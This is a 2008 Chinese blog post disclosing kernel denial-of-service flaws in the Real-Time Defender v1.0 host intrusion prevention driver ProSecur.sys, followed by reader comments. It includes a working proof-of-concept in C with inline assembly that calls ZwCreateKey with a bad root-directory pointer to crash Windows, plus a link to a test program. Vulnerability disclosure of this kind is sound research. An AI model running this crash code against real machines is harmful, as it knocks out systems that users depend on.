百度空间 | 百度首页 
 
查看文章
 
Real-Time Defender v1.0 多处内核拒绝服务漏洞
2008-10-02 10:47

Real-time Defender Professional(简称RTD)是一款主机入侵防护系统。

RTD的最新版本v1.0中存在多处内核拒绝服务漏洞,可导致任意权限用户在安装了RTD的系统上可引发蓝屏。

出问题的组件:ProSecur.sys ,版本:1.1.1.0,CheckSum = 0x00046c99 , TimeStamp = 0x48a51de8

该问题同之前Malware defender的问题类似(http://hi.baidu.com/mj0011/blog/item/464aad31aed4f7ae5fdf0e4f.html)RTD在很多SSDT HOOK函数中,对参数检查不够严格,就将参数传递给系统的 ZwXxx函数,结果引发蓝屏。

示例函数:hk_ZwCreateKey

偏移:0x21f56

测试代码:

WCHAR xx[] = L"xxxx_fuck_rtd";

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;

InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);

__asm{
  
   push 0
    push 0
    push 0
    push 0
    lea eax,oba
    push eax
    push 0
    push 0
    call p
   
}

return ;

测试程序下载:http://mj0011.ys168.com 漏洞演示目录下BSOD_rtd.rar


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (9)
 
最近读者:
 
网友评论:
1
2008-10-02 10:52 | 回复
传递一个参数就蓝屏吗 ?
 
2
2008-10-02 11:50 | 回复
MJ知道我在用这个后就开始来打击我了… RTD能免费已经不错了
 
3
2008-10-02 12:04 | 回复
对了,RTD是个人编写的~前身是ProSecurity 刚被收购~所以换了名字
 
4
2008-10-02 13:04 | 回复
你能换点别的找找吗 你的漏洞都一个样
 
5
2008-10-02 13:22 | 回复
有漏洞就可以了 你管一样不一样?
 
7
2008-10-02 15:16 | 回复
不知 rtd是COMODO的哪位大哥写的?
 
8
2008-10-02 15:46 | 回复
WCHAR xx[] = L"xxxx_fuck_rtd"; 为什么动不动就FUCK呢?
 
10
2008-10-08 19:40 | 回复
【好多人不登陆就留言】
 
11
2008-10-14 13:41 | 回复
不登陆是因为怕骂。 而并非怕MJ骂。因为来这里面有N多是MJ的FNAS, 所以我只看,不发言。 (MJ别骂我..)
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu